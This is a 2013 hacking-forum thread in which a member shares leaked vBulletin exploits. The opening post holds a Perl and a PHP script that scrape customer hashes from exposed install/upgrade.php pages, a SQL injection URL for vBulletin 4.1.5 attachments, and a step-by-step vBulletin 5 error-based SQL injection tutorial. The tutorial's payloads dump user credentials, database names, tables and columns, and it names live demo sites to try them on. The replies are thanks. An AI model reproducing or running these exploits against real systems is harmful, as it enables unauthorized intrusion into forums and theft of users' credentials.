Hello There, Guest! Login Register
Logo
Dismiss this notice
MaDLeeTs is not responsible for any attacks that are carried out on networks, websites or servers.
MaDLeeTs staff members cannot be held responsible.
All information on this forum is for educational purposes only.


all 0day 2013 vbulletin leaked -_- fuck script kiddies

  • 0 Vote(s) - 0 Average


09-08-2013, 08:44 PM #1
CrashBandicot Offline MaDLeeTs LoVer *****
MaDLeeTs LoVer
Posts:104 Threads:15 Joined:Jul 2013 Reputation: 4
Mood: Zombie
vBulletin x.x.x Customer Area 0day


PHP Code:
Bulletin x.x.x Customer Area 0day
Perl script got  leaked  so decided to post the perl script here

Code
:
#!/usr/bin/perl

use LWP::UserAgent;
use 
HTTP::Request::Common;


system('cls');
system('title vBulletin Install Auto Exploiter');
print 
"\n ---------------------------------------";
print 
"\n vBulletin Install Auto Exploiter founded by pixel_death, n3tw0rk & z0ne\n";
print 
" ---------------------------------------\n";
print 
" + d4tabase.com -+- d4tabase.com + ";
print 
"\n ---------------------------------------\n";
print 
" coded by n0tch shoutz d4tabase crew ";
print 
"\n ---------------------------------------\n";


if($
#ARGV == -1 or $#ARGV > 0)
{
print 
"\n usage: ./vBulletin.pl domain (without http://) \n\n";
exit;
}


$domain $ARGV[0];
$install_dir "install";
$full_domain "http://$domain/$install_dir/upgrade.php";
chop($domain);


&
search;




sub search
{
$url $full_domain;
$lwp LWP::UserAgent->new();
$lwp -> agent("Mozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8");
$request $lwp->post($url, ["searchHash" => "Search"]);


print 
" Searching $domain ----\n ";
if (
$request->content =~ /CUSTNUMBER = \"(.+)\";/)
{
print "
Result : $1\n";
} else {
print "
HashHash not found!\n";
}
}






php exploit -
--------------------


<!--?php
set_time_limit(0);


if(
$argc < 2) {
    echo "
Usage: {$argv[0]} http://site.ru/forum" . PHP_EOL;
    
exit;
}


$URL $argv[1];
$arr parse_url($URL);


### work with url
if(strpos($URL'?')) die("Ohh, your URL is not valid");
if(
substr($URL, -11) != '/'$URL $URL '/';
if(!
$arr['scheme']) $URL 'http://' $URL;


$headers get_headers($URL '/install/upgrade.php');
if(
substr($headers[0], 93) == '200') {
    
$source file_get_contents($URL "/install/upgrade.php");
}
elseif(
$headers get_headers($URL '/install/finalupgrage.php')) {
    if(
substr($headers[0], 93) == '200'$source file_get_contents($URL "/install/finalupgrage.php");
}
else die(
"something went wrong...");


preg_match_all('|var CUSTNUMBER = "(.*?)";|'$source$res);
foreach (
$res[1] as $hash) {
    echo 
"Hash: " $hash PHP_EOL;
    
$fp fopen("hash.txt""a+");
    
fwrite($fp$hash PHP_EOL);
}
?>



vBulletin 4.1.x / 5.x.x Upgrade 0day Exploit


PHP Code:
vBulletin  4.1.x  /  5.x.x   Upgrade   0day  ExploitCreated byBoxheadFound on08/22/2013Websitehttp://belegit.net
Example:http://test.com/forum/install/upgrade.php
  
Website:        
    
Customer ID:        
    
Username:        
    
Password:        
    
Email


vbulletin 4.1.5 attachment SQLI



PHP Code:
vbulletin 4.1.5 attachment SQLI
examine variables came across sq
-injection, as later found to be inherent to all vbulletin 4.1.5TitleVulnerability in vBulletin 4.1.5 DorkPowered by Powered by vBulletin 4.1.5 ConditionsThe account on the forumPermission to attach files to messages themes (attachmentsRegister -> go to the forum -> click a topic or if the board isyou can choose to create an article (the second option more work) -> at the bottom looking Attachments 'Manage Attachments' - > Open the window and setting "values ??[f]" insert our SQL queryExample:

Code:
http://site.com/board/newattachment.php?do=assetmanager&values[f]=-1599+or(1,2)=(select*from(select+name_const(version(),1),name_const(version(),1))a)&contenttypeid=18&poststarttime=1360663633&posthash=4f5c850593e10c5450d9e880d58a56d8&insertinline=1
After thatwe see the standard error of the database offlinethus opening the source code of the page and see:


Code:
<!-- -  
Database error in vBulletin 4.1.5 :  

Invalid SQL :  

             
SELECT  
                 permissionsfrom 
,  Hidden ,  setpublish ,  publishdate ,  userid 
             FROM ds23fSDdfsdf_cms_node  
             WHERE  
                 nodeid  
= - 1599  or ( ) = ( Select from Select name_const version () , ), name_const version (), )) );  

MySQL Error    :  Duplicate column Name  .1.49-'5 '  
Error Number   :  1060  
Request Date   
:  Tuesday ,  February 12th  2013   @  01 12 33 PM  
Error Date     
:  Tuesday ,  February 12th  2013   @  01 12 33  


Address     
:  127.0.0.1  
Username       
:  Hacker  
Classname      
:  vB_Database  
MySQL Version  
:   
-> 


vbulletin 5 sql injection

PHP Code:
vBulletin 5.0.0 all Beta releases SQL Injection Exploit 0day_ _ _ _ _____ _____ ___ _____ _ ______ 
| | | | | | | | | | | |/ _  |_ _| (_) | ___
| |
_| | __ _ ___| | ___ _ __ _ _ __ __| | | |/' |_ _| |/' / /_  | |_ __ ___ _ __ _ _ __ | |_ ___ _ __ __ _ ___ 
|/ _` |/ __| |/ / | | |/ _` | '__/ _` | | /| \ \/ / /| | _ | | | '__| |/ _` | '_ \| _/ _ \| '__/ _` |/ 
| | | | (_| | (__| <| |_| | (_| | | | (_| |  |_/ /> < |_/ / | | | | | | | (_) | | (_| | | | | || (_) | | | (_| | __/
_| |_/__,_|___|_|___, |__,_|___,____//_/\_\\___/\_| |_/ \_/_| \___/| |\__,_|_| |_\_| \___/|_| \__, |\___|
__/ | _/ | __/ | 
|
___/ |__/ |___
____ ____ __ _ ______ ____ ____ 
_ __
__ )__ __/ / /__ / /_(_)___ ____/ / __ __ ____ ___ __
| | / / __ / / / / / / __/ / __  /___  / / / / / / / __ `/ / / /
| |/ / /_/ / /_/ / / / __/ /_/ / / / / ____/ / / /_/ / /_/ / /_/ / /_/ / 
|___/_____/\__,_/_/_/\___/\__/_/_/ /_/ /_____/ \____/_____/\__,_/\__, / 
/____/

************************************************** ****************
#Title: vBulletin 5 SQL Injection > Beta Whatever
#Author: 0x0A
#Date: Dec 11, 2012
#Category: web application
#Type: SQL Injection
#Requirements: Firefox/Live HTTP Headers/
#Software Link: http://www.vbulletin.com/purchases/
http://www.vbulletin.com/features/
#Homepage: hackyard.net
***********.com
#Version: 5 and above(not older versions)
#Tested on: Linux bt 3.2.6 #1 SMP Fri Feb 17 10:40:05 EST 2012 i686 GNU/Linux
#Demo sites to try: http://www.sultantheme.com/vb5connectforum/
http://vb5connect.com/bb/
************************************************** ****************



-------------------------------------------------------------------
-------------------------------------------------------------------
How to
-------------------------------------------------------------------
-------------------------------------------------------------------


-------------------------------------------------------------------
================================================== =================
-------------------------------------------------------------------
[#1] First of all, make an account to the vBulletin 5 forum,

http://img402.imageshack.us/img402/7784/69376730.png
-------------------------------------------------------------------
================================================== =================
-------------------------------------------------------------------



-------------------------------------------------------------------
================================================== =================
-------------------------------------------------------------------
[#2] After that, go to any topic and open Live HTTP Headers (https://addons.mozilla.org/en-us/fir...-http-headers/)

http://imageshack.us/a/img12/305/89268702.png
-------------------------------------------------------------------
================================================== =================
-------------------------------------------------------------------


-------------------------------------------------------------------
================================================== =================
-------------------------------------------------------------------
[#3] After that click the Like button, you will receive almost the same result as me. Go to the first POST record as the picture below and click Replay button,

http://imageshack.us/a/img707/9990/68621087.png
-------------------------------------------------------------------
================================================== =================
-------------------------------------------------------------------


-------------------------------------------------------------------
================================================== =================
-------------------------------------------------------------------
[#4] Then, on Send POST Content use this:

-------------------------------------------------------------------------------------------------------------------------------------------------------------------
nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,username,0x27,0x7e,password,0x27, 0x7e) FROM user LIMIT 1,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
-------------------------------------------------------------------------------------------------------------------------------------------------------------------

http://imageshack.us/a/img42/1590/26447606.png

//Note that to keep the noteid value as it was as default in the POST Content. Instead you
`ll get invalid noteid error.
The following SQLi command will fetch out the first record from user table(username/password).
-------------------------------------------------------------------
================================================== =================
-------------------------------------------------------------------




-------------------------------------------------------------------
================================================== =================
-------------------------------------------------------------------
[
#Other SQLi Syntaxes]

+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
|
Version():
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+



+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
|
User():
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(user() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+



+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
|
Database():
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+


+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
|
Database Print:
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7eFROM information_schema.schemata LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+



+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
|
Table Count:
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(table_name),0x27,0x7eFROM `information_schema`.tables WHERE table_schema=0xHEXCODEOFDATABASE)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+



+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
|Print 
Tables:
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7eFROM information_schema.tables Where table_schema=0xHEXCODEOFDATABASE LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+



+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
|
Columns of selected table:
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(column_name),0x27,0x7eFROM `information_schema`.columns WHERE table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+



+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
|
Fetch Out Data:
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,column1,0x27,0x7e,column2,0x27,0x 7eFROM ANY_TABLE LIMIT N,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
+------------------------------------------------------------------------------------------------------------------------------------------------------------------+

-------------------------------------------------------------------
================================================== =================
-------------------------------------------------------------------

|
 
' /
-- (*) --
>*<
>0<@<
>>>@<<*
>@>*<0<<<
>*>>@<<<@<<
>@>>0<<<*<<@<
>*>>0<<@<<<@<<<
>@>>*<<@<>*<<0<*<
\*/ >0>>*<<@<>0><<*<@<<
___\\U//___ >*>>@><0<<*>>@><*<0<<
|\\ | | \\| >@>>0<*<0>>@<<0<<<*<@<< 
| \\| | _(UU)_ >((*))_>0><*<0><@<<<0<*<
|\ \| || / //||.*.*.*.|>>@<<*<<@>><0<<<
Merry Xmas |\\_|_|&&_// ||*.*.*.*|_\\db//_ 
""""|'
.'.'.|~~|.*.*.*| ____|_
|'.'.'.|  |____|>>>>>>|
~~~~~~~~ '""""
`------'



----------------------------------------------------

==[ That
`s it!
==[ 
Thanks0x0A!
==[ 
Romania

---------------------------------------------------- 


http://pastebin.com/5hgWHFbj

09-08-2013, 09:44 PM #2
Federal Offline Junior Member **
Registered
Posts:16 Threads:1 Joined:Feb 2013 Reputation: 0
Mood: None
Nice wink

09-08-2013, 09:48 PM #3
IsLam4ever Offline TeaM MaDLeeTs ***
TeaM MaDLeeTs
Posts:58 Threads:11 Joined:Aug 2013 Reputation: 0
Mood: None
thxx bro ..

09-08-2013, 11:11 PM #4
AZ Sn1ff3r (PCP) Offline Mad Lover of Security ******
V.I.P
Posts:461 Threads:46 Joined:Mar 2013 Reputation: 0
Mood: Mad
nice Biggrinsmiley Biggrinsmiley Biggrinsmiley Biggrinsmiley

09-09-2013, 12:09 AM #5
CrashBandicot Offline MaDLeeTs LoVer *****
MaDLeeTs LoVer
Posts:104 Threads:15 Joined:Jul 2013 Reputation: 4
Mood: Zombie
(09-08-2013, 09:44 PM)Federal Wrote:  
Nice wink
thnkx ab souini ket user 0day upgrade taya ma3 dz27

09-09-2013, 02:41 AM #6
x00x Offline Member ***
Registered
Posts:243 Threads:23 Joined:May 2013 Reputation: 0
Mood: None
Nice share..


?? ??? ??? ???? ???? ???? ????








09-09-2013, 06:12 AM #7
CrashBandicot Offline MaDLeeTs LoVer *****
MaDLeeTs LoVer
Posts:104 Threads:15 Joined:Jul 2013 Reputation: 4
Mood: Zombie
thnkx

09-09-2013, 07:05 AM #8
Huey Offline 'Surgeon of Death' ******
V.I.P
Posts:816 Threads:125 Joined:Apr 2013 Reputation: 5
Mood: Horny
this is awesome man, thanks Biggrinsmiley

[Image: qINan8u.gif]
[Image: BaTfRLZ.png]
why educate professionals and have noobs helpless?
http://hack-db.com/search.html?q=anonymous+caribbean

09-09-2013, 01:53 PM #9
Waledac Offline TeaM MaDLeeTs ***
TeaM MaDLeeTs
Posts:14 Threads:0 Joined:Mar 2013 Reputation: 0
Mood: None
awesome share Biggrinsmiley wink

09-09-2013, 06:03 PM #10
rox.root12 Offline Member ***
Registered
Posts:117 Threads:22 Joined:Aug 2012 Reputation: 0
Mood: Alone
Thanks For Share

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
<<<<===Hacking Is Not Crime Its mY job ====>>>>

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
[Image: 2W3Ux.gif]






Forum Jump:


Users browsing this thread:1 Guest(s)